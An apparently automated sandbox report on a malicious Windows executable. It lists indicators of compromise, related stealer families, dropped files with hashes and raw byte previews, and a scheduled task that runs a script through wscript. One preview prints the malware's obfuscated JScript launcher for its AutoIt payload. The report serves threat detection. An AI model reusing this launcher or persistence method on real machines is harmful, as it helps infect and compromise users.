      https://www.maxmind.com/en/locate-my-ip-addressOrigin.piffalse
      • Avira URL Cloud: safe
      unknown
      http://www.autoitscript.com/autoit3/05daucomrx8.exe, 00000000.00000003.1530090678.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Origin.pif, 0000000B.00000003.1605691240.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, Origin.pif, 00000015.00000002.3984435194.0000000004E7D000.00000004.00000020.00020000.00000000.sdmp, Origin.pif.2.dr, SecureHawk.pif.11.dr, Beginning.0.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      3.36.173.8
      unknownUnited States
      8987AMAZONEXPANSIONGBtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1519279
      Start date and time:2024-09-26 09:48:17 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 3s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:5daucomrx8.exe
      renamed because original name is a hash value
      Original Sample Name:33ff8752083bf6b5105749bf5b772b4a.exe
      Detection:MAL
      Classification:mal100.rans.troj.evad.winEXE@30/56@2/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 85%
      • Number of executed functions: 87
      • Number of non-executed functions: 308
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: 5daucomrx8.exe
      TimeTypeDescription
      03:49:27API Interceptor1x Sleep call for process: 5daucomrx8.exe modified
      03:50:10API Interceptor8785x Sleep call for process: Origin.pif modified
      03:50:19API Interceptor7063x Sleep call for process: SecureHawk.pif modified
      09:49:33Task SchedulerRun new task: SecureHawk path: wscript s>//B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js"
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3.36.173.8External24.exeGet hashmaliciousRisePro StealerBrowse
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZONEXPANSIONGBCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
        • 3.33.130.190
        https://mail-105280.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 52.223.40.198
        https://telstra-104088.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 52.223.40.198
        https://telstra-102246.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 3.33.220.150
        https://mitammakslogona.gitbook.io/Get hashmaliciousUnknownBrowse
        • 3.33.220.150
        https://telstra-104752.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 52.223.40.198
        https://telstra-100710.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 3.33.220.150
        https://netzero-webmail-106103.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
        • 52.223.40.198
        https://sky-108991.weeblysite.com/Get hashmaliciousUnknownBrowse
        • 3.33.220.150
        https://sky-102775.weeblysite.com/Get hashmaliciousUnknownBrowse
        • 3.33.220.150
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pifbe5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeGet hashmaliciousRedLineBrowse
          be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeGet hashmaliciousRedLineBrowse
            7632e569071acc40bce87af592e4cc2476d9c088906a1.exeGet hashmaliciousRedLineBrowse
              setup.exeGet hashmaliciousUnknownBrowse
                setup.exeGet hashmaliciousUnknownBrowse
                  SecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exeGet hashmaliciousRedLineBrowse
                    Autodesk AutoCAD 2023.exeGet hashmaliciousVidarBrowse
                      oRALyHjeXB.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                        oRALyHjeXB.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                          file.exeGet hashmaliciousSmokeLoaderBrowse
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):182
                            Entropy (8bit):4.837689770780988
                            Encrypted:false
                            SSDEEP:3:RiMIpGXJO9obdPHo55wWAX+TSyCVVh4EkD5pM6iQEdcQ47c6Hc5uWAX+TSyCVVh8:RiJuOybJHonwWDmLJkD3Vi7L4A6HcwWH
                            MD5:46BBF4A98EFED6F73ED445DCB9FA7BA5
                            SHA1:3BA1B56F7F746D633B1B65E82D67331FFF50277A
                            SHA-256:D54B5A05CC374A09565DEC9949DE743EF7927263ED280DF852F53023F715CE95
                            SHA-512:4BA6E0D2EE4FA53BEE8F39A845A6D4D8E18219CDE82B8911D44AB2EE1B63A36E97A058273C49D3652A87B4DD5989DF75798C6CE3F3E72688CEE52A9D90FE6064
                            Malicious:true
                            Preview:new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\LinkGuard Dynamics\\SecureHawk.pif\" \"C:\\Users\\user\\AppData\\Local\\LinkGuard Dynamics\\r\"")
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):937776
                            Entropy (8bit):6.777413141364669
                            Encrypted:false
                            SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                            MD5:B06E67F9767E5023892D9698703AD098
                            SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                            SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                            SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, Detection: malicious, Browse
                            • Filename: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, Detection: malicious, Browse
                            • Filename: 7632e569071acc40bce87af592e4cc2476d9c088906a1.exe, Detection: malicious, Browse
                            • Filename: setup.exe, Detection: malicious, Browse
                            • Filename: setup.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exe, Detection: malicious, Browse
                            • Filename: Autodesk AutoCAD 2023.exe, Detection: malicious, Browse
                            • Filename: oRALyHjeXB.exe, Detection: malicious, Browse
                            • Filename: oRALyHjeXB.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:data
                            Category:dropped
                            Size (bytes):1887862
                            Entropy (8bit):7.999916955507098
                            Encrypted:true
                            SSDEEP:49152:eh1tn99JwLCa3od7rs8p0b4UC0OmHmEp7w21fKR3vBWu5Vo:Ktn9fA3od0+Dx0Z3j1yR75Vo
                            MD5:CE540AF01EBE7AB061B8E799882D8031
                            SHA1:67A6C762AA5E1CB1C3623561D2A3D6AD98F150AF
                            SHA-256:15657816E7B9C8F5F8E3A73E2266186DDE03AFD3E680E20D6E14747446973684
                            SHA-512:06F83915FEA36F523E99A56D5C71404AC4E4062AE690404A89262BE2D26968BDDC5A42AE091CDEC4CE568541B877E59DF71F92369566B228C3EDFE510A6BBC9F
                            Malicious:true
                            Preview:.p......C7...._9....8..5M...h..T..F..(..cd.:.#K85)]$."...r....4.j...<9...~..)qi.>...e..............O...D.H..?.....DS.&..l.H.....J.N.."...&l&.H.X.D.\....NJ...LS..^.M.1...%".~.|.Z.)T.t~...C.t.....H.....P...Rt..%.#..h....`B...................s..z.+...'..*.D.....m.............[..::...._....&..t....6..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....C.<.'.F...h.............T......{T......{kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..}.!..,P..Myn.2..t.W.....L..f.P...T......{T......{m.....:c..8.5...x..2).U.j....2>.$#.~....E.....$h...}......H..l.{F...3G......`*w.r.3.*mq...K.R.......m%_^W...H.... .(.....6.F.|m#n...N:Ta.....<..)....... .^e.z...X b.^.....3g..+...4A...?.O.Q
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):937776
                            Entropy (8bit):6.777413141364669
                            Encrypted:false
                            SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                            MD5:B06E67F9767E5023892D9698703AD098
                            SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                            SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                            SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1887862
                            Entropy (8bit):7.999916955507098
                            Encrypted:true
                            SSDEEP:49152:eh1tn99JwLCa3od7rs8p0b4UC0OmHmEp7w21fKR3vBWu5Vo:Ktn9fA3od0+Dx0Z3j1yR75Vo
                            MD5:CE540AF01EBE7AB061B8E799882D8031
                            SHA1:67A6C762AA5E1CB1C3623561D2A3D6AD98F150AF
                            SHA-256:15657816E7B9C8F5F8E3A73E2266186DDE03AFD3E680E20D6E14747446973684
                            SHA-512:06F83915FEA36F523E99A56D5C71404AC4E4062AE690404A89262BE2D26968BDDC5A42AE091CDEC4CE568541B877E59DF71F92369566B228C3EDFE510A6BBC9F
                            Malicious:true
                            Preview:.p......C7...._9....8..5M...h..T..F..(..cd.:.#K85)]$."...r....4.j...<9...~..)qi.>...e..............O...D.H..?.....DS.&..l.H.....J.N.."...&l&.H.X.D.\....NJ...LS..^.M.1...%".~.|.Z.)T.t~...C.t.....H.....P...Rt..%.#..h....`B...................s..z.+...'..*.D.....m.............[..::...._....&..t....6..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....C.<.'.F...h.............T......{T......{kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..}.!..,P..Myn.2..t.W.....L..f.P...T......{T......{m.....:c..8.5...x..2).U.j....2>.$#.~....E.....$h...}......H..l.{F...3G......`*w.r.3.*mq...K.R.......m%_^W...H.... .(.....6.F.|m#n...N:Ta.....<..)....... .^e.z...X b.^.....3g..+...4A...?.O.Q
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):10240
                            Entropy (8bit):6.347014053077155
                            Encrypted:false
                            SSDEEP:192:RULsNQ6UUrUM6M1spD4QoHfqwipOcS0BiPyI+mHV8Fmepp2JaDwb7H:RUIi6J89nOrHV8Eepte7H
                            MD5:E7AB122EBABDAE8843EEDA7A57C7F29A
                            SHA1:0083D949CE43F5B549F06395BA4658461CF2A345
                            SHA-256:EE31F3476D9C7A824EF34A4E639E02F793436E5608483F43D5FBDD3FBCB22C04
                            SHA-512:614EE05987918709B61718D25305970A5FFBED46B1C88802EF9416F98C9469B795D2A917D3873F331A07C9985565119FFAB80821FE4134C03DA197BFDBEE89C8
                            Malicious:false
                            Preview:.j....Yf9H..K....~......8.u.E...f9P........M.C..D..f9P..U........E........ .................-~..H...}..H...}..H..u}...U.H.E.........}...E..M..E..u.PF..6...E..M..U......A.j.Yf9H...{~...M.IN.}...M........M...6...M.....6...M.....,~..;...$~...E..8...,....E.E..u...|...PF.5..3........!..I....A.j.Yf9H....~...M....}.....].C.]......}...u.E..u..u..u.P.E.P.E.PV.......&........A.j.Yf9H....}...E.HN..|.....E.........|....:5....|......;5...E..x.;.......Wju.s}...8..."}...8........8....}...8..U...L....8!...|...8#........|...u.3..u..u..u.QPRS......x....M...4...M...4...M...4...M...4...M...4....|.....4...M...4...._^[..].....x|..H..,|...M.....E..U.j.[...........A.j.Yf9H....|...}........Wjt.|...A.j.Yf9H...k|...E.M......E..M......U.E..M.j.[....k.......c.......Y.....|...U.JN.}...U.ts.M...3...M.....3...U..x.;.......Wh......{...A.j.Yf9H....{...E.HN.}...E.t..M..|3...M....3...E...x.;.......Wjx.{...^..^...^..E....^..........@..GD.^.@.n.@.A.@...@...@...@...@.O.@.p.@.........U.......SVW
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):134774
                            Entropy (8bit):7.998618153684933
                            Encrypted:true
                            SSDEEP:3072:kQuFArbnYPs0H3CV0ZZd1v8M1P+8rLpNCoqn:kQuFUbnBjVWhvP+8rDin
                            MD5:C7E15E6E38E166594B2C9C2A60945065
                            SHA1:B0F80F15FE6AE9AEDB5A9BBE0D3C01D8867E2FBC
                            SHA-256:6AFE68081A9F723647DAC3276C79B46EA0577D4B3DEE7673438DB1D95989E95B
                            SHA-512:917CE2DA529CC9FA1CA9A9C9AB0685016C1EB6BEDC658138DA076A0A4028B7B7BD915169E497F7C01AA2012A4175D2E71FC78A93950B64C57C5CC36F85279475
                            Malicious:true
                            Preview:-..q..K...^....%[..d..b..c..*J.....dy.Kj....m.h..Q.1..5......A.z..^../eR'.ps...f.....D`.h..0.."!{5......>.,..h.9;.SU.F.o.OV...tIa..)eOc..Yw.V....I.....#.6 ...u>..{.Hnqc.w..M`..|...... .5..`.x4..Nk.......C...mD...^*.J/.../p...~......+..O..2."..14....A;...|.r...<..`z..[..}....Kk!......M...q...9)........0O>x...~.....WfV...`...=...i.2.O......Y.W.w.&.....%.)Ju....(.5...f.k..x...iw......{...d...\..-.m.7....{._..o.*......*.......V.gy...S.0...o5y"-..h23:.s...XZs...n|Z.EV.k..0...m....\z......-.y.L...../.N?..Sq.B../....{..]....A.].V.%...]r... D...J..Q..:....h..=N2=.!.J...-..g.O2..x.F....@h.p.`..c...v.5.^.|:.3..(.=.e..o...B...u..H\.a.{8F.....0..5..4...#.-\x..Qe..q.L...m.......q...k.......4.r..q.j.....x...U..N.%...W..(.A5OM.t.EfEL.m<$NU."......52.W>H..b....t%2q.Ex.d.........QNe..Z\&..Q...XO..\.`.3E.....L.....*.w..];..L.g..W...B..[....W..X.P8....S.&>/..L..cV.3.M..>.w.W.....|..D...\....09....?2........^..g..#....NU/N.o..Lf@.3..`.......ah...."..?..:..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:DOS executable (COM)
                            Category:dropped
                            Size (bytes):11884
                            Entropy (8bit):7.30812932734099
                            Encrypted:false
                            SSDEEP:192:D1SXWsR2tlitnzx98QVQ/8tVkUTgBxe1HCjv4pdhhmGj7l0ieJ2Q:DopEitriaIKJ7775i
                            MD5:0FBD02AFE1832C658A9087680614B367
                            SHA1:C3C30D9184A9AFBA434FE35679AB2D268139CEF3
                            SHA-256:D68E51F51EC32BBD131A65995DBC0387216B206DFAC652EC28A30D78D787ADA8
                            SHA-512:AB0BD0B5249AB9BCBAA3D914488AE601F93EB10E45407EE2D4A01777884EBC14BF978147134640148A7BB9642965DF1F00A9F794A3CA73214DD4D51548E089C8
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:.5.6>6g6.6.6.6.7C7N7t7.7.7.7.8a8q8.8.8.8!9I9q9.9.;.<.<.<"<&<*<.<2<6<:<><B<F<J<N<R<x<.<.<.<.<R=.=]>y>.>.>e?......p....1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2"2(2D2.2.2.2.2.2.2.284.5g5.7.7.7.7.7.7.7.7.8.8.8.9W>j>t>.>.?!?V?.?....H....0.0.0.2.2.2.2.2.3.3W4.5c5.5.6.8.:.:.:.:2;.<U=.=.=.=.>/?^?.?.?......X...31.2y2.2L3j3.3.4,4.4'5f5l5.5[6.6'7J7s7.7.8.8.949u9.:z:.;`;.;F<}=.=.=3>X>.>.>c?.?....`...g0.0.0)1v1.1.2.2*212[2.2.2.2.2.2.3.3(393J3[3l3.3%4B4.4.4.4.4.5.5.6.6.6*7.8.8.8.8.9.;.;.>. ..(...h1.1.2.3&5.626A7v7.:X>.>.>.>.?.?.0......g0r0.0.0.0.1#3.3.3.3.3.4#4(4?5E5N5m5.5.5.5.5.6.6.6.6.6.9/:>:S:r:.:.:.:.:.:.;.;P;};.;.;.<@<t<.<.<.<.<.<.=/=f=.=.=.=v>.?...@..p...11.1v2{2.2.2.2.363@3h3.3.3.3.4#4c4.4.4.7+808\8v8.8.8.8'9W9.9.9.9&:Q:X;x;.;.;.=.=.=O>{>.>.>.>.>0?w?.?.?.?.P..L....0S1.1.2.3.3U3)4.4E7U7.7.7.7.7.8^8.8.9.9.:.<9<a<.<.</=m=u=.=.=.=.=4>.`......l0.0.0.1.1.1.1W3.3.5.5.5.556F6.6.6.6.6.6.7'7C7Q7_7u7.7.7.7.7.7*8D8W8t8.8.9$9f9.9.9.:!:.:.:.:.;B;];.;.;.;.;.<+<.<.<.<t=.=.=.=.>1>:>.>.?B?H?.?.?...p......<0`0z0.0
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56320
                            Entropy (8bit):6.785206989556843
                            Encrypted:false
                            SSDEEP:1536:/27MlRHq6EQU7uLQT6unj5ctpYuYtWGJG2kQi:e7MlRKecTF5c2p02kQi
                            MD5:D4F1427F4E333A46E2B9399B3A386ACE
                            SHA1:8ABBA4EC1B6DD2BAB5A6702BE3EB0FF3BE18EBFD
                            SHA-256:21D0FF8C6969D0D4917B4536726EEF4406A3B41321AF3657A1AA3C31F74C79B4
                            SHA-512:D561321878FE7C0440F0C9F54C0BEF073152A167EEDB8B536756A40F2AEA6B988BFACB6AA0E346E2D8C2A7324DDCD16BF70FF4E97FD255C7311527904EAB2D70
                            Malicious:false
                            Preview:...............t3.p...t,.........t..+................3.......}....5..K.V.O..Y.k.....p..............e..Y.....g..K.....itd..nt%..o..=..............y[.............M..............x.................. t.f................z.....@.....................u........................3........u...guV..........J;.~.........=....~7..]...W.k...............Y..t............................................G.............P...............P............VP.5<.K...8.I............t!.......u.......PV.5H.K...8.I...YY......gu...u.......PV.5D.K...8.I...YY.>-..(.........F....................j.....s......HH...........k...j'.........X..........|....Q.....0................^......3......... t...@t...G.....G.....@t..G........O.....@t.;...|.;.s........................u...........y.3.B................;.~......u........u..J..............t=.......RPWQ.....0................9~...............N.............E.+.F............t6..t..>0t-N........0.!..u..5..K.....I.8.t.@..u.+.....................@t5......t......-
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8192
                            Entropy (8bit):6.565667666829138
                            Encrypted:false
                            SSDEEP:192:Fsmnze84mcy29iFnyq7S6XgRZi3LdB1gPOf0WcKPVo1FNVvmQ23:FsmC84Ll9iRrNXxdB1gv4PSTNVvmQ8
                            MD5:827E7D95831EA2B7AE99AFB191C98832
                            SHA1:E0432635061534BC2B5C06A8B7D5D7EDAF983183
                            SHA-256:BDD60D53935978F3ADF4DC5AEFAF8156360F0C680E387A91AF7C4E1FC8AFDD25
                            SHA-512:23FFC2964E7F14F783BAC607A733D1015C1592A32121CD52CBFDD7A4F839234393B8CDF175EAC0E219F14AF0B1F2F5A1838F2889878BE9B91D3FCF6D4E8F4B96
                            Malicious:false
                            Preview:u.W....Y.p.S3.PPPPVWPP....I....t$;.}.V..S."...Y3.E.QQSPVWQQ....I..E.[_^..].SW3...PPj.SPh........I.....t-V3.j.Z.........Q....YW..Vj.Sj.h........I...^_[.U..E.Ht.Hu=.u..prL..u..u..$.=.rL..t$.}..t..u...rL..u..u..P.............2.]...U..Q.e...=.rL..t!.E...rL.P.u.........k.....t.......E..prL.P.u..Q..........]...U....S..M.V3.W.s..s..A..u..C...t....A..C..A..C..9.;........3..j Z.........3...........P...Y..t!.8...O.E.x......i..... Oy.E.3.....C.93~H..u..E..s...x....N......G..F..G..F..G.P.....G..M..F... .E.@.M..E.;.|._^..[..]...V..N........^........U..V..N......~'H.....o...j.X3.F.j.Z.........Q....Y....f.E..F.....f..3..f.H...^]...Vh.^F..q..6j Q.^...V.(...Y..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U....SV..M.W.....u..u.....I....`...3.].9].u.3.G.........W.M.."...f9.t.W.M.G.....j;Yf9.u.....}..v..G.P.M......j;Yf9.t.....3.j Z...........3...........P....Y..t!.....K.E...x......... Ky.E.3...3..M....F..E.P.E..].P.E.].P.E..E.....P.E.P.E.PS._.......uF.E..}.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):43008
                            Entropy (8bit):5.316829091033339
                            Encrypted:false
                            SSDEEP:768:DI4kSmEusWjcdeDvFQC7VkrHpluuxdCvEHKKgI0:vusWjcdmQuklluhvEHKT
                            MD5:5CBB6AC4AFB2BDF6988C7581A9E19D46
                            SHA1:CE87849C6CAD83A7A145283F233BF02D72358BF3
                            SHA-256:A3D48BCB65A8B7651FBAB2C36260E25487929495CCA8A9B98EF26AF3DE802517
                            SHA-512:0F1435F9961DD7929016598F9B115210F609A263F4CDB6A08AC5BDAF9357DEBC9CD926F711BE03463AB250D6C0FB5BF6784A5017602645560875EDD98B89FF91
                            Malicious:false
                            Preview:.j.?=...Mpm........?c..+...?................Bp.VV..?........Q9V.%..?........]|.=3..?......?|.._P..?.%.....?..Zq\.? ,6....?.5DKB.?.@IK...?.Xf...?v......?..'....?+..3...?2...y..?g.../.p<.......?7C.....?.......................?........E.D;..?..........h7.r.?...=...?.(...r.?..EV.w.?......?.......?0.SM`..?...?3..?./..*2.?5.6Y.z.?......?..G.e.?.4.....?.%..KV.........?..r..H.?.................I,+...?..........U&X>.?..........i....?.c4...?.......?.......?..N..T.?..j8.6.?.f*"!..?~w."...?nJ.R...?1...7!.?|.GD.|.?.......?...*.a.?.}. ..<.......?.pA..?................ZM..$^.@........].>.=..@........Z..7.@.abK...?..Z...@...t...?..,....@.T..4s.?.a.g...@Xp.M...@.D.$_..@.n}in..@..).M..@......@P(.*.C.?. ...mz........@.E3.&..................fY.eY.!@..........,..d&@........#7.B.,@.......@=..U.&2@UUUUUU.@9.E4..7@.......@.}..=m=@.......@. 8..B@.[..[..@.u+E6.G@.......@.......?...............@.........................HO..3.........oX... ?..........%......#.Z..."S-...>Q..!.r.?.M%....;..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):37888
                            Entropy (8bit):7.9957365930290685
                            Encrypted:true
                            SSDEEP:768:qWPn6K+BXIxpEno35N+hHrpQcJ+nPnZVJSRMueLPwYtebtefV:oxBKEo35MHrJ2HJEeL4YteboV
                            MD5:B0F0B5535514047C83C7B2FA25324DCC
                            SHA1:A010BF77C2684BF4D567243A8A1DCBD0AC07A734
                            SHA-256:5754A22B9CCA09B0E018139D55BC32FC3206E399D416DB20F7207AA9F5A38425
                            SHA-512:14EEA51CDC1E07399A9A2D599CF6057362852EDA34D5D2DA82C84E66B37D324E6875A1A43C3B0F93077B9A76A6BAE05C77679CE2495EABCB50341ECDD3D0CB8A
                            Malicious:true
                            Preview:...l..W.7MaZ&.Wf%.].......I.F.....m.....j...>....6..x....~.dV......,`...hWGA..r..T.5.9.3.m.^Q..:.o.H..r.1...^..V.og.u9.{w.PL4;.Y........... H.+EM|.].H.o.Fv.V~8.PG.n"..Ng..d...!..Dc.C,%d.-....1.....'.i..?8..w..C:..G.X.I.....( .$...d.0...M..w2-+...`...U.x.)..-)..x...p...Z.....[.L.fU)..Tp./..7I.A.-./AH.r.+...J....M...."?D..6...l.M(.O......J...#|'ZN.>..&._1..?...J.......?..3..ss3.}...h.!...j..-~i.L.Q+l..};.K6.}G+...Q..of\.)......V...."...>^....t.JB..5v.J..,=..+......F.8%.b...s..X)W......1.O..X._ez.{../%a..\...u..RI@[ .....&......c...K.......f._(*K..pA..p.l!..~.#,d..a&EP;....B......F.7F.M....ix........)NL....8./Z......K&.......9.#(Yc.HG*..u...$I.w.B.N.H.!U.....eo..9.9.#8...t.t_.{.&v...8..L.......E../.....O......%t..Y'..4[.....D.......D.......#Q.`K~...&..[.3...UU9X.;6k........0.Z.EK.E.R-....$/..y.....k.5.\@..&.......p..g5).+.V.jy}z...+..O.D.H.d#...sQ....q.^...[w^.p.W.+...hX...c...j.}..2......z...s..4..y=G.r.......sG*0.R.Q........<....+.c.Q.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):44032
                            Entropy (8bit):7.9428180907324295
                            Encrypted:false
                            SSDEEP:768:qNcNngX+F+2tzjOrnhILBWdinOEgg+ys6kQ3+laXM77HLqno09q6R6gx+gXr:qNcpzjIqIinTglynkQ3+EX0eomqewg
                            MD5:24DD5D66C756FA9137D34729169A7940
                            SHA1:1E3446FEBCB5280185648C3B763B709A10D0A3CF
                            SHA-256:564193BF3415F803065F54113098012C86B9904A7D09DAD7C004658858248C48
                            SHA-512:12D6721155D381BEA89B03CC3446357195BF3863AEBD07A3C2C5863160449A7C0E8EB0588071064E3D80A665E9E3460266FC45EC0BF09136B51440CE524DD2C0
                            Malicious:false
